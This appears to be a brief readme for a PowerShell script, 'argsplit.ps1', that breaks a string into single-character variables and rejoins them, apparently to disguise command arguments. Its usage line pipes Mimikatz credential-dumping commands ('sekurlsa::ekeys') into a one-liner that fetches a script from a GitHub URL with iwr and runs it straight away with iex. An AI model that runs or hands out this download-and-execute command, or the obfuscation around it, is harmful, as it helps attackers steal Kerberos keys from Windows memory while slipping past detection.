argsplit.ps1 : Split string and assigned each of the characters to variable. Next it will joined all the variable.
Usage :
echo '"sekurlsa::ekeys" "exit"'| powershell -c "(iex(iwr https://raw.githubusercontent.com/zief/Powershell-Misc/main/argsplit.ps1 -usebasicparsing))"